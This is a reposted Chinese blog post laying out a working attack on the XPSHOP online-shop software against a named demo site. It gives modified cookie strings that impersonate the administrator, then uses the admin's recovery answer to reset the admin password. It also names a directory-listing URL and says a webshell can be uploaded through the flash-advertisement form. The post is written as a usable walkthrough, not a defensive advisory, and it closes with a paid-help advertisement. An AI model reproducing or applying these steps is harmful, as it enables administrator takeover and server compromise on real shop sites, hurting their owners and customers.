XPSHOP商城系統漏洞
[重要通告]如您遇疑難雜癥,本站支持知識付費業務,掃右邊二維碼加博主微信,可節省您寶貴時間哦!
XPSHOP商城系統漏洞 本文轉載老康BLOG
無意中發現這個漏洞的..官方現在還不知道...我沒有在別處公布哦..
這個漏洞不好...要直拉改人家管理員密碼!!有點兒缺德!!!...
但為了我們的網絡更安全..還是看看吧...
首先先看看這個站吧:http://demo1.xpshop.cn/
先注冊一個用戶進去..為了方便也為了不要那么垃圾賬戶在人家系統里.我這說一下我注冊好了的用戶名:wc1217 密碼:77423704
好..還是用啊D打開網站比較好..記得要保留cookies
之后便看看他的Cookies...
代碼:
LoginCode=0684; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=14
我們改一下這兩個值:LoginCode=0684;mid=14 .......都改成1 :
代碼:
LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1點擊修改..后右鍵刷新看一下..要注意.不要刷得太快...不然就沒用了..
之后就OK了:
當然..也有可能沒有..那我們就要改一下:"ASP.NET_SessionId=" 這個值就好了..隨便改一個字就行:如下:
代碼:
LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=fu1q1w3g3qc2vn55naohei55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1好了..現在再看看會員信息:
是不是有一個"找回密碼答案:"呵.....個位都想到了吧..直接就能改管理員密碼了..
http://demo1.xpshop.cn/memberLostpass.aspx這個是改密碼的..
成功.....http://demo1.xpshop.cn/admin/default.aspx這里登錄后就是怎么拿WEBSHELL了..
可是我一直沒弄成..理論是只有這樣才行..看..
先插馬..再備份..但這里出錯了..
還望達人能想出更好的辦法..
我想了一晚上了....沒轍了....
http://demo1.xpshop.cn/admin/ftb.imagegallery.aspx?frame=1&rif=admin&cif=admin 這可以列目錄
好..就那么多了
http://demo1.xpshop.cn/helps/t.txt
添加flash廣告處可直接上傳馬
營銷管理 - flash廣告添加
問題未解決?付費解決問題加Q或微信 2589053300 (即Q號又微信號)右上方掃一掃可加博主微信
所寫所說,是心之所感,思之所悟,行之所得;文當無敷衍,落筆求簡潔。 以所舍,求所獲;有所依,方所成!